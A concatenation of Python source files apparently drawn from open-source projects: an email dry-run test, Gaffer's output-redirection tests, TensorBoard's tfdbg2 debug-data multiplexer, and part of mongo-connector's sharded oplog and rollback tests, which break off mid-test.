@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
OutputRedirectionTest.py
|
##########################################################################
#
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import sys
import unittest
import threading
import time
import Gaffer
import GafferTest
class OutputRedirectionTest( GafferTest.TestCase ) :
def testRedirection( self ) :
out = []
err = []
with Gaffer.OutputRedirection( stdOut = out.append, stdErr = err.append ) :
sys.stdout.write( "OUT" )
print "PRINT",
sys.stderr.write( "ERR" )
self.assertEqual( out, [ "OUT", "PRINT" ] )
self.assertEqual( err, [ "ERR" ] )
sys.stdout.write( "" )
sys.stderr.write( "" )
self.assertEqual( out, [ "OUT", "PRINT" ] )
self.assertEqual( err, [ "ERR" ] )
def testThreading( self ) :
perThreadOuts = []
perThreadErrs = []
threads = []
def f( threadIndex ) :
with Gaffer.OutputRedirection( stdOut = perThreadOuts[threadIndex].append, stdErr = perThreadErrs[threadIndex].append ) :
for i in range( 0, 100 ) :
sys.stdout.write( "OUT %d %d" % ( threadIndex, i ) )
sys.stderr.write( "ERR %d %d" % ( threadIndex, i ) )
time.sleep( 0.001 )
for i in range( 0, 100 ) :
perThreadOuts.append( [] )
perThreadErrs.append( [] )
t = threading.Thread( target = f, args = ( i, ) )
threads.append( t )
t.start()
for t in threads :
t.join()
for i in range( 0, 100 ) :
self.assertEqual( len( perThreadOuts[i] ), 100 )
self.assertEqual( len( perThreadErrs[i] ), 100 )
for j in range( 0, 100 ) :
self.assertEqual( perThreadOuts[i][j], "OUT %d %d" % ( i, j ) )
self.assertEqual( perThreadErrs[i][j], "ERR %d %d" % ( i, j ) )
if __name__ == "__main__":
unittest.main()
|
debug_data_multiplexer.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A wrapper around DebugDataReader used for retrieving tfdbg v2 data."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from tensorboard import errors
# Dummy run name for the debugger.
# Currently, the `DebuggerV2ExperimentMultiplexer` class is tied to a single
# logdir, which holds at most one DebugEvent file set in the tfdbg v2 (tfdbg2
# for short) format.
# TODO(cais): When tfdbg2 allows there to be multiple DebugEvent file sets in
# the same logdir, replace this magic string with actual run names.
DEFAULT_DEBUGGER_RUN_NAME = "__default_debugger_run__"
# Default number of alerts per monitor type.
# Limiting the number of alerts is based on the consideration that usually
# only the first few alerting events are the most critical and the subsequent
# ones are either repetitions of the earlier ones or caused by the earlier ones.
DEFAULT_PER_TYPE_ALERT_LIMIT = 1000
def run_in_background(target):
"""Run a target task in the background.
In the context of this module, `target` is the `update()` method of the
underlying reader for tfdbg2-format data.
This method is mocked by unit tests for deterministic behaviors during
testing.
Args:
target: The target task to run in the background, a callable with no args.
"""
# TODO(cais): Implement repetition with sleeping periods in between.
    # TODO(cais): Add more unit tests in debug_data_multiplexer_test.py when
    # the behavior gets more complex.
thread = threading.Thread(target=target)
thread.start()
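# A minimal usage sketch (illustrative only; `reader` is an assumed
# DebugDataReader-like object, not defined in this module):
#
#     reader = debug_events_reader.DebugDataReader(logdir)
#     run_in_background(reader.update)  # returns immediately; update() runs in a thread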
def _alert_to_json(alert):
# TODO(cais): Replace this with Alert.to_json() when supported by the
# backend.
from tensorflow.python.debug.lib import debug_events_monitors
if isinstance(alert, debug_events_monitors.InfNanAlert):
return {
"alert_type": "InfNanAlert",
"op_type": alert.op_type,
"output_slot": alert.output_slot,
# TODO(cais): Once supported by backend, add 'op_name' key
# for intra-graph execution events.
"size": alert.size,
"num_neg_inf": alert.num_neg_inf,
"num_pos_inf": alert.num_pos_inf,
"num_nan": alert.num_nan,
"execution_index": alert.execution_index,
"graph_execution_trace_index": alert.graph_execution_trace_index,
}
else:
raise TypeError("Unrecognized alert subtype: %s" % type(alert))
class DebuggerV2EventMultiplexer(object):
"""A class used for accessing tfdbg v2 DebugEvent data on local filesystem.
This class is a short-term hack, mirroring the EventMultiplexer for the main
    TensorBoard plugins (e.g., scalar, histogram and graphs). As such, it only
    implements the methods relevant to the Debugger V2 plugin.
TODO(cais): Integrate it with EventMultiplexer and use the integrated class
from MultiplexerDataProvider for a single path of accessing debugger and
non-debugger data.
"""
def __init__(self, logdir):
"""Constructor for the `DebugEventMultiplexer`.
Args:
logdir: Path to the directory to load the tfdbg v2 data from.
"""
self._logdir = logdir
self._reader = None
def FirstEventTimestamp(self, run):
"""Return the timestamp of the first DebugEvent of the given run.
This may perform I/O if no events have been loaded yet for the run.
Args:
run: A string name of the run for which the timestamp is retrieved.
This currently must be hardcoded as `DEFAULT_DEBUGGER_RUN_NAME`,
as each logdir contains at most one DebugEvent file set (i.e., a
run of a tfdbg2-instrumented TensorFlow program.)
Returns:
The wall_time of the first event of the run, which will be in seconds
since the epoch as a `float`.
"""
if self._reader is None:
            raise ValueError("No tfdbg2 runs exist.")
if run != DEFAULT_DEBUGGER_RUN_NAME:
raise ValueError(
"Expected run name to be %s, but got %s"
% (DEFAULT_DEBUGGER_RUN_NAME, run)
)
return self._reader.starting_wall_time()
def PluginRunToTagToContent(self, plugin_name):
raise NotImplementedError(
"DebugDataMultiplexer.PluginRunToTagToContent() has not been "
"implemented yet."
)
def Runs(self):
"""Return all the run names in the `EventMultiplexer`.
        The `Runs()` method of this class is specialized for tfdbg2-format
        DebugEvent files: it returns at most the single default debugger run.
Returns:
If tfdbg2-format data exists in the `logdir` of this object, returns:
```
{runName: { "debugger-v2": [tag1, tag2, tag3] } }
```
        where `runName` is the hard-coded string `DEFAULT_DEBUGGER_RUN_NAME`.
        This reflects the fact that a logdir currently contains at most one
        tfdbg2 DebugEvent file set.
If no tfdbg2-format data exists in the `logdir`, an empty `dict`.
"""
if self._reader is None:
try:
from tensorflow.python.debug.lib import debug_events_reader
from tensorflow.python.debug.lib import debug_events_monitors
self._reader = debug_events_reader.DebugDataReader(self._logdir)
self._monitors = [
debug_events_monitors.InfNanMonitor(
self._reader, limit=DEFAULT_PER_TYPE_ALERT_LIMIT
)
]
                # NOTE(cais): Currently each logdir is enforced to have only one
                # DebugEvent file set, so we add a hard-coded default run name.
run_in_background(self._reader.update)
# TODO(cais): Start off a reading thread here, instead of being
# called only once here.
except ImportError:
# This ensures graceful behavior when tensorflow install is
# unavailable.
return {}
except AttributeError:
# Gracefully fail for users without the required API changes to
# debug_events_reader.DebugDataReader introduced in
# TF 2.1.0.dev20200103. This should be safe to remove when
# TF 2.2 is released.
return {}
except ValueError:
# When no DebugEvent file set is found in the logdir, a
# `ValueError` is thrown.
return {}
return {
DEFAULT_DEBUGGER_RUN_NAME: {
# TODO(cais): Add the semantically meaningful tag names such as
# 'execution_digests_book', 'alerts_book'
"debugger-v2": []
}
}
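    # For reference (illustrative): when tfdbg2 data is present, the method above
    # returns {"__default_debugger_run__": {"debugger-v2": []}}, and {} otherwise.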
def _checkBeginEndIndices(self, begin, end, total_count):
if begin < 0:
raise errors.InvalidArgumentError(
"Invalid begin index (%d)" % begin
)
if end > total_count:
raise errors.InvalidArgumentError(
"end index (%d) out of bounds (%d)" % (end, total_count)
)
if end >= 0 and end < begin:
raise errors.InvalidArgumentError(
"end index (%d) is unexpectedly less than begin index (%d)"
% (end, begin)
)
if end < 0: # This means all digests.
end = total_count
return end
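    # Illustrative examples (not from the original source): with total_count=10,
    # (begin=0, end=-1) normalizes to end=10 (i.e., all items), whereas
    # (begin=5, end=3) raises InvalidArgumentError.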
def Alerts(self, run, begin, end, alert_type_filter=None):
"""Get alerts from the debugged TensorFlow program.
Args:
run: The tfdbg2 run to get Alerts from.
begin: Beginning alert index.
end: Ending alert index.
alert_type_filter: Optional filter string for alert type, used to
restrict retrieved alerts data to a single type. If used,
`begin` and `end` refer to the beginning and ending indices within
the filtered alert type.
"""
from tensorflow.python.debug.lib import debug_events_monitors
runs = self.Runs()
if run not in runs:
return None
alerts = []
alerts_breakdown = dict()
alerts_by_type = dict()
for monitor in self._monitors:
monitor_alerts = monitor.alerts()
if not monitor_alerts:
continue
alerts.extend(monitor_alerts)
# TODO(cais): Replace this with Alert.to_json() when
# monitor.alert_type() is available.
if isinstance(monitor, debug_events_monitors.InfNanMonitor):
alert_type = "InfNanAlert"
else:
alert_type = "__MiscellaneousAlert__"
alerts_breakdown[alert_type] = len(monitor_alerts)
alerts_by_type[alert_type] = monitor_alerts
num_alerts = len(alerts)
if alert_type_filter is not None:
if alert_type_filter not in alerts_breakdown:
raise errors.InvalidArgumentError(
"Filtering of alerts failed: alert type %s does not exist"
% alert_type_filter
)
alerts = alerts_by_type[alert_type_filter]
end = self._checkBeginEndIndices(begin, end, len(alerts))
return {
"begin": begin,
"end": end,
"alert_type": alert_type_filter,
"num_alerts": num_alerts,
"alerts_breakdown": alerts_breakdown,
"per_type_alert_limit": DEFAULT_PER_TYPE_ALERT_LIMIT,
"alerts": [_alert_to_json(alert) for alert in alerts[begin:end]],
}
def ExecutionDigests(self, run, begin, end):
"""Get ExecutionDigests.
Args:
run: The tfdbg2 run to get `ExecutionDigest`s from.
begin: Beginning execution index.
end: Ending execution index.
Returns:
A JSON-serializable object containing the `ExecutionDigest`s and
related meta-information
"""
runs = self.Runs()
if run not in runs:
return None
        # TODO(cais): For scalability, use begin and end kwargs when available in
        # `DebugDataReader.executions()`.
execution_digests = self._reader.executions(digest=True)
end = self._checkBeginEndIndices(begin, end, len(execution_digests))
return {
"begin": begin,
"end": end,
"num_digests": len(execution_digests),
"execution_digests": [
digest.to_json() for digest in execution_digests[begin:end]
],
}
def ExecutionData(self, run, begin, end):
"""Get Execution data objects (Detailed, non-digest form).
Args:
          run: The tfdbg2 run to get `Execution` data from.
begin: Beginning execution index.
end: Ending execution index.
Returns:
          A JSON-serializable object containing the detailed `Execution` objects
          and related meta-information.
"""
runs = self.Runs()
if run not in runs:
return None
        # TODO(cais): For scalability, use begin and end kwargs when available in
        # `DebugDataReader.executions()`.
execution_digests = self._reader.executions(digest=True)
end = self._checkBeginEndIndices(begin, end, len(execution_digests))
execution_digests = execution_digests[begin:end]
executions = [
self._reader.read_execution(digest) for digest in execution_digests
]
return {
"begin": begin,
"end": end,
"executions": [execution.to_json() for execution in executions],
}
def SourceFileList(self, run):
runs = self.Runs()
if run not in runs:
return None
return self._reader.source_file_list()
def SourceLines(self, run, index):
runs = self.Runs()
if run not in runs:
return None
try:
host_name, file_path = self._reader.source_file_list()[index]
except IndexError:
raise errors.NotFoundError(
"There is no source-code file at index %d" % index
)
return {
"host_name": host_name,
"file_path": file_path,
"lines": self._reader.source_lines(host_name, file_path),
}
def StackFrames(self, run, stack_frame_ids):
runs = self.Runs()
if run not in runs:
return None
stack_frames = []
for stack_frame_id in stack_frame_ids:
if stack_frame_id not in self._reader._stack_frame_by_id:
raise errors.NotFoundError(
"Cannot find stack frame with ID %s" % stack_frame_id
)
# TODO(cais): Use public method (`stack_frame_by_id()`) when
# available.
# pylint: disable=protected-access
stack_frames.append(self._reader._stack_frame_by_id[stack_frame_id])
# pylint: enable=protected-access
return {"stack_frames": stack_frames}
|
test_oplog_manager_sharded.py
|
# Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import sys
import threading
import time
import bson
import pymongo
from pymongo.read_preferences import ReadPreference
from pymongo.write_concern import WriteConcern
sys.path[0:0] = [""]
from mongo_connector.doc_managers.doc_manager_simulator import DocManager
from mongo_connector.locking_dict import LockingDict
from mongo_connector.oplog_manager import OplogThread
from mongo_connector.test_utils import (ShardedCluster,
assert_soon,
close_client)
from mongo_connector.util import retry_until_ok, bson_ts_to_long
from tests import unittest, SkipTest
class TestOplogManagerSharded(unittest.TestCase):
"""Defines all test cases for OplogThreads running on a sharded
cluster
"""
def setUp(self):
""" Initialize the cluster:
Clean out the databases used by the tests
Make connections to mongos, mongods
Create and shard test collections
Create OplogThreads
"""
self.cluster = ShardedCluster().start()
# Connection to mongos
self.mongos_conn = self.cluster.client()
# Connections to the shards
self.shard1_conn = self.cluster.shards[0].client()
self.shard2_conn = self.cluster.shards[1].client()
self.shard1_secondary_conn = self.cluster.shards[0].secondary.client(
read_preference=ReadPreference.SECONDARY_PREFERRED)
self.shard2_secondary_conn = self.cluster.shards[1].secondary.client(
read_preference=ReadPreference.SECONDARY_PREFERRED
)
# Wipe any test data
self.mongos_conn["test"]["mcsharded"].drop()
# Create and shard the collection test.mcsharded on the "i" field
self.mongos_conn["test"]["mcsharded"].create_index("i")
self.mongos_conn.admin.command("enableSharding", "test")
self.mongos_conn.admin.command("shardCollection",
"test.mcsharded",
key={"i": 1})
# Pre-split the collection so that:
# i < 1000 lives on shard1
# i >= 1000 lives on shard2
self.mongos_conn.admin.command(bson.SON([
("split", "test.mcsharded"),
("middle", {"i": 1000})
]))
# disable the balancer
self.mongos_conn.config.settings.update_one(
{"_id": "balancer"},
{"$set": {"stopped": True}},
upsert=True
)
# Move chunks to their proper places
try:
self.mongos_conn["admin"].command(
"moveChunk",
"test.mcsharded",
find={"i": 1},
to='demo-set-0'
)
except pymongo.errors.OperationFailure:
pass
try:
self.mongos_conn["admin"].command(
"moveChunk",
"test.mcsharded",
find={"i": 1000},
to='demo-set-1'
)
except pymongo.errors.OperationFailure:
pass
# Make sure chunks are distributed correctly
self.mongos_conn["test"]["mcsharded"].insert_one({"i": 1})
self.mongos_conn["test"]["mcsharded"].insert_one({"i": 1000})
def chunks_moved():
doc1 = self.shard1_conn.test.mcsharded.find_one()
doc2 = self.shard2_conn.test.mcsharded.find_one()
if None in (doc1, doc2):
return False
return doc1['i'] == 1 and doc2['i'] == 1000
assert_soon(chunks_moved, max_tries=120,
message='chunks not moved? doc1=%r, doc2=%r' % (
self.shard1_conn.test.mcsharded.find_one(),
self.shard2_conn.test.mcsharded.find_one()))
self.mongos_conn.test.mcsharded.delete_many({})
# create a new oplog progress file
try:
os.unlink("oplog.timestamp")
except OSError:
pass
open("oplog.timestamp", "w").close()
# Oplog threads (oplog manager) for each shard
doc_manager = DocManager()
oplog_progress = LockingDict()
self.opman1 = OplogThread(
primary_client=self.shard1_conn,
doc_managers=(doc_manager,),
oplog_progress_dict=oplog_progress,
ns_set=["test.mcsharded", "test.mcunsharded"],
mongos_client=self.mongos_conn
)
self.opman2 = OplogThread(
primary_client=self.shard2_conn,
doc_managers=(doc_manager,),
oplog_progress_dict=oplog_progress,
ns_set=["test.mcsharded", "test.mcunsharded"],
mongos_client=self.mongos_conn
)
def tearDown(self):
try:
self.opman1.join()
except RuntimeError:
pass # thread may not have been started
try:
self.opman2.join()
except RuntimeError:
pass # thread may not have been started
close_client(self.mongos_conn)
close_client(self.shard1_conn)
close_client(self.shard2_conn)
close_client(self.shard1_secondary_conn)
close_client(self.shard2_secondary_conn)
self.cluster.stop()
def test_get_oplog_cursor(self):
"""Test the get_oplog_cursor method"""
# timestamp = None
cursor1 = self.opman1.get_oplog_cursor(None)
oplog1 = self.shard1_conn["local"]["oplog.rs"].find(
{'op': {'$ne': 'n'},
'ns': {'$not': re.compile(r'\.system')}})
self.assertEqual(list(cursor1), list(oplog1))
cursor2 = self.opman2.get_oplog_cursor(None)
oplog2 = self.shard2_conn["local"]["oplog.rs"].find(
{'op': {'$ne': 'n'},
'ns': {'$not': re.compile(r'\.system')}})
self.assertEqual(list(cursor2), list(oplog2))
# earliest entry is the only one at/after timestamp
doc = {"ts": bson.Timestamp(1000, 0), "i": 1}
self.mongos_conn["test"]["mcsharded"].insert_one(doc)
latest_timestamp = self.opman1.get_last_oplog_timestamp()
cursor = self.opman1.get_oplog_cursor(latest_timestamp)
self.assertNotEqual(cursor, None)
self.assertEqual(cursor.count(), 1)
next_entry_id = cursor[0]['o']['_id']
retrieved = self.mongos_conn.test.mcsharded.find_one(next_entry_id)
self.assertEqual(retrieved, doc)
# many entries before and after timestamp
for i in range(2, 2002):
self.mongos_conn["test"]["mcsharded"].insert_one({
"i": i
})
oplog1 = self.shard1_conn["local"]["oplog.rs"].find(
sort=[("ts", pymongo.ASCENDING)]
)
oplog2 = self.shard2_conn["local"]["oplog.rs"].find(
sort=[("ts", pymongo.ASCENDING)]
)
# oplogs should have records for inserts performed, plus
# various other messages
oplog1_count = oplog1.count()
oplog2_count = oplog2.count()
self.assertGreaterEqual(oplog1_count, 998)
self.assertGreaterEqual(oplog2_count, 1002)
pivot1 = oplog1.skip(400).limit(-1)[0]
pivot2 = oplog2.skip(400).limit(-1)[0]
cursor1 = self.opman1.get_oplog_cursor(pivot1["ts"])
cursor2 = self.opman2.get_oplog_cursor(pivot2["ts"])
self.assertEqual(cursor1.count(), oplog1_count - 400)
self.assertEqual(cursor2.count(), oplog2_count - 400)
def test_get_last_oplog_timestamp(self):
"""Test the get_last_oplog_timestamp method"""
# "empty" the oplog
self.opman1.oplog = self.shard1_conn["test"]["emptycollection"]
self.opman2.oplog = self.shard2_conn["test"]["emptycollection"]
self.assertEqual(self.opman1.get_last_oplog_timestamp(), None)
self.assertEqual(self.opman2.get_last_oplog_timestamp(), None)
# Test non-empty oplog
self.opman1.oplog = self.shard1_conn["local"]["oplog.rs"]
self.opman2.oplog = self.shard2_conn["local"]["oplog.rs"]
for i in range(1000):
self.mongos_conn["test"]["mcsharded"].insert_one({
"i": i + 500
})
oplog1 = self.shard1_conn["local"]["oplog.rs"]
oplog1 = oplog1.find().sort("$natural", pymongo.DESCENDING).limit(-1)[0]
oplog2 = self.shard2_conn["local"]["oplog.rs"]
oplog2 = oplog2.find().sort("$natural", pymongo.DESCENDING).limit(-1)[0]
self.assertEqual(self.opman1.get_last_oplog_timestamp(),
oplog1["ts"])
self.assertEqual(self.opman2.get_last_oplog_timestamp(),
oplog2["ts"])
def test_dump_collection(self):
"""Test the dump_collection method
Cases:
1. empty oplog
2. non-empty oplog
"""
# Test with empty oplog
self.opman1.oplog = self.shard1_conn["test"]["emptycollection"]
self.opman2.oplog = self.shard2_conn["test"]["emptycollection"]
last_ts1 = self.opman1.dump_collection()
last_ts2 = self.opman2.dump_collection()
self.assertEqual(last_ts1, None)
self.assertEqual(last_ts2, None)
# Test with non-empty oplog
self.opman1.oplog = self.shard1_conn["local"]["oplog.rs"]
self.opman2.oplog = self.shard2_conn["local"]["oplog.rs"]
for i in range(1000):
self.mongos_conn["test"]["mcsharded"].insert_one({
"i": i + 500
})
last_ts1 = self.opman1.get_last_oplog_timestamp()
last_ts2 = self.opman2.get_last_oplog_timestamp()
self.assertEqual(last_ts1, self.opman1.dump_collection())
self.assertEqual(last_ts2, self.opman2.dump_collection())
self.assertEqual(len(self.opman1.doc_managers[0]._search()), 1000)
def test_init_cursor(self):
"""Test the init_cursor method
Cases:
1. no last checkpoint, no collection dump
2. no last checkpoint, collection dump ok and stuff to dump
3. no last checkpoint, nothing to dump, stuff in oplog
4. no last checkpoint, nothing to dump, nothing in oplog
5. no last checkpoint, no collection dump, stuff in oplog
6. last checkpoint exists
7. last checkpoint is behind
"""
# N.B. these sub-cases build off of each other and cannot be re-ordered
# without side-effects
# No last checkpoint, no collection dump, nothing in oplog
# "change oplog collection" to put nothing in oplog
self.opman1.oplog = self.shard1_conn["test"]["emptycollection"]
self.opman2.oplog = self.shard2_conn["test"]["emptycollection"]
self.opman1.collection_dump = False
self.opman2.collection_dump = False
self.assertTrue(all(doc['op'] == 'n'
for doc in self.opman1.init_cursor()[0]))
self.assertEqual(self.opman1.checkpoint, None)
self.assertTrue(all(doc['op'] == 'n'
for doc in self.opman2.init_cursor()[0]))
self.assertEqual(self.opman2.checkpoint, None)
# No last checkpoint, empty collections, nothing in oplog
self.opman1.collection_dump = self.opman2.collection_dump = True
cursor, cursor_empty = self.opman1.init_cursor()
self.assertEqual(cursor, None)
self.assertTrue(cursor_empty)
self.assertEqual(self.opman1.checkpoint, None)
cursor, cursor_empty = self.opman2.init_cursor()
self.assertEqual(cursor, None)
self.assertTrue(cursor_empty)
self.assertEqual(self.opman2.checkpoint, None)
# No last checkpoint, empty collections, something in oplog
self.opman1.oplog = self.shard1_conn["local"]["oplog.rs"]
self.opman2.oplog = self.shard2_conn["local"]["oplog.rs"]
oplog_startup_ts = self.opman2.get_last_oplog_timestamp()
collection = self.mongos_conn["test"]["mcsharded"]
collection.insert_one({"i": 1})
collection.delete_one({"i": 1})
time.sleep(3)
last_ts1 = self.opman1.get_last_oplog_timestamp()
cursor, cursor_empty = self.opman1.init_cursor()
self.assertFalse(cursor_empty)
self.assertEqual(self.opman1.checkpoint, last_ts1)
with self.opman1.oplog_progress as prog:
self.assertEqual(prog.get_dict()[self.opman1.replset_name],
last_ts1)
# init_cursor should point to startup message in shard2 oplog
cursor, cursor_empty = self.opman2.init_cursor()
self.assertFalse(cursor_empty)
self.assertEqual(self.opman2.checkpoint, oplog_startup_ts)
# No last checkpoint, no collection dump, stuff in oplog
progress = LockingDict()
self.opman1.oplog_progress = self.opman2.oplog_progress = progress
self.opman1.collection_dump = self.opman2.collection_dump = False
collection.insert_one({"i": 1200})
last_ts2 = self.opman2.get_last_oplog_timestamp()
self.opman1.init_cursor()
self.assertEqual(self.opman1.checkpoint, last_ts1)
with self.opman1.oplog_progress as prog:
self.assertEqual(prog.get_dict()[self.opman1.replset_name],
last_ts1)
cursor, cursor_empty = self.opman2.init_cursor()
for doc in cursor:
last_doc = doc
self.assertEqual(last_doc["o"]["i"], 1200)
self.assertEqual(self.opman2.checkpoint, last_ts2)
with self.opman2.oplog_progress as prog:
self.assertEqual(prog.get_dict()[self.opman2.replset_name],
last_ts2)
# Last checkpoint exists
progress = LockingDict()
self.opman1.oplog_progress = self.opman2.oplog_progress = progress
for i in range(1000):
collection.insert_one({"i": i + 500})
entry1 = list(
self.shard1_conn["local"]["oplog.rs"].find(skip=200, limit=-2))
entry2 = list(
self.shard2_conn["local"]["oplog.rs"].find(skip=200, limit=-2))
progress.get_dict()[self.opman1.replset_name] = entry1[0]["ts"]
progress.get_dict()[self.opman2.replset_name] = entry2[0]["ts"]
self.opman1.oplog_progress = self.opman2.oplog_progress = progress
self.opman1.checkpoint = self.opman2.checkpoint = None
cursor1, _ = self.opman1.init_cursor()
cursor2, _ = self.opman2.init_cursor()
self.assertEqual(entry1[1]["ts"], next(cursor1)["ts"])
self.assertEqual(entry2[1]["ts"], next(cursor2)["ts"])
self.assertEqual(self.opman1.checkpoint, entry1[0]["ts"])
self.assertEqual(self.opman2.checkpoint, entry2[0]["ts"])
with self.opman1.oplog_progress as prog:
self.assertEqual(prog.get_dict()[self.opman1.replset_name],
entry1[0]["ts"])
with self.opman2.oplog_progress as prog:
self.assertEqual(prog.get_dict()[self.opman2.replset_name],
entry2[0]["ts"])
# Last checkpoint is behind
progress = LockingDict()
progress.get_dict()[self.opman1.replset_name] = bson.Timestamp(1, 0)
progress.get_dict()[self.opman2.replset_name] = bson.Timestamp(1, 0)
self.opman1.oplog_progress = self.opman2.oplog_progress = progress
self.opman1.checkpoint = self.opman2.checkpoint = None
cursor, cursor_empty = self.opman1.init_cursor()
self.assertTrue(cursor_empty)
self.assertEqual(cursor, None)
self.assertIsNotNone(self.opman1.checkpoint)
cursor, cursor_empty = self.opman2.init_cursor()
self.assertTrue(cursor_empty)
self.assertEqual(cursor, None)
self.assertIsNotNone(self.opman2.checkpoint)
def test_rollback(self):
"""Test the rollback method in a sharded environment
Cases:
1. Documents on both shards, rollback on one shard
2. Documents on both shards, rollback on both shards
"""
self.opman1.start()
self.opman2.start()
# Insert first documents while primaries are up
db_main = self.mongos_conn["test"]["mcsharded"]
db_main2 = db_main.with_options(write_concern=WriteConcern(w=2))
db_main2.insert_one({"i": 0})
db_main2.insert_one({"i": 1000})
self.assertEqual(self.shard1_conn["test"]["mcsharded"].count(), 1)
self.assertEqual(self.shard2_conn["test"]["mcsharded"].count(), 1)
# Case 1: only one primary goes down, shard1 in this case
self.cluster.shards[0].primary.stop(destroy=False)
# Wait for the secondary to be promoted
shard1_secondary_admin = self.shard1_secondary_conn["admin"]
assert_soon(
lambda: shard1_secondary_admin.command("isMaster")["ismaster"])
# Insert another document. This will be rolled back later
def cond():
try:
db_main.insert_one({"i": 1})
except:
pass
return db_main.find_one({"i": 1})
retry_until_ok(cond)
db_secondary1 = self.shard1_secondary_conn["test"]["mcsharded"]
db_secondary2 = self.shard2_secondary_conn["test"]["mcsharded"]
self.assertEqual(db_secondary1.count(), 2)
# Wait for replication on the doc manager
# Note that both OplogThreads share the same doc manager
c = lambda: len(self.opman1.doc_managers[0]._search()) == 3
assert_soon(c, "not all writes were replicated to doc manager",
max_tries=120)
# Kill the new primary
self.cluster.shards[0].secondary.stop(destroy=False)
# Start both servers back up
self.cluster.shards[0].primary.start()
primary_admin = self.shard1_conn["admin"]
c = lambda: primary_admin.command("isMaster")["ismaster"]
assert_soon(lambda: retry_until_ok(c))
self.cluster.shards[0].secondary.start()
secondary_admin = self.shard1_secondary_conn["admin"]
c = lambda: secondary_admin.command("replSetGetStatus")["myState"] == 2
assert_soon(c)
query = {"i": {"$lt": 1000}}
assert_soon(lambda: retry_until_ok(db_main.find(query).count) > 0)
# Only first document should exist in MongoDB
self.assertEqual(db_main.find(query).count(), 1)
self.assertEqual(db_main.find_one(query)["i"], 0)
def check_docman_rollback():
docman_docs = [d for d in self.opman1.doc_managers[0]._search()
if d["i"] < 1000]
return len(docman_docs) == 1 and docman_docs[0]["i"] == 0
assert_soon(check_docman_rollback,
"doc manager did not roll back")
# Wait for previous rollback to complete.
# Insert/delete one document to jump-start replication to secondaries
# in MongoDB 3.x.
db_main.insert_one({'i': -1})
db_main.delete_one({'i': -1})
def rollback_done():
secondary1_count = retry_until_ok(db_secondary1.count)
secondary2_count = retry_until_ok(db_secondary2.count)
return (1, 1) == (secondary1_count, secondary2_count)
assert_soon(rollback_done,
"rollback never replicated to one or more secondaries")
##############################
# Case 2: Primaries on both shards go down
self.cluster.shards[0].primary.stop(destroy=False)
self.cluster.shards[1].primary.stop(destroy=False)
# Wait for the secondaries to be promoted
shard1_secondary_admin = self.shard1_secondary_conn["admin"]
shard2_secondary_admin = self.shard2_secondary_conn["admin"]
assert_soon(
lambda: shard1_secondary_admin.command("isMaster")["ismaster"])
assert_soon(
lambda: shard2_secondary_admin.command("isMaster")["ismaster"])
# Insert another document on each shard. These will be rolled back later
retry_until_ok(db_main.insert_one, {"i": 1})
self.assertEqual(db_secondary1.count(), 2)
retry_until_ok(db_main.insert_one, {"i": 1001})
self.assertEqual(db_secondary2.count(), 2)
# Wait for replication on the doc manager
c = lambda: len(self.opman1.doc_managers[0]._search()) == 4
assert_soon(c, "not all writes were replicated to doc manager")
# Kill the new primaries
self.cluster.shards[0].secondary.stop(destroy=False)
self.cluster.shards[1].secondary.stop(destroy=False)
# Start the servers back up...
# Shard 1
self.cluster.shards[0].primary.start()
c = lambda: self.shard1_conn['admin'].command("isMaster")["ismaster"]
assert_soon(lambda: retry_until_ok(c))
self.cluster.shards[0].secondary.start()
secondary_admin = self.shard1_secondary_conn["admin"]
c = lambda: secondary_admin.command("replSetGetStatus")["myState"] == 2
assert_soon(c)
# Shard 2
self.cluster.shards[1].primary.start()
c = lambda: self.shard2_conn['admin'].command("isMaster")["ismaster"]
assert_soon(lambda: retry_until_ok(c))
self.cluster.shards[1].secondary.start()
secondary_admin = self.shard2_secondary_conn["admin"]
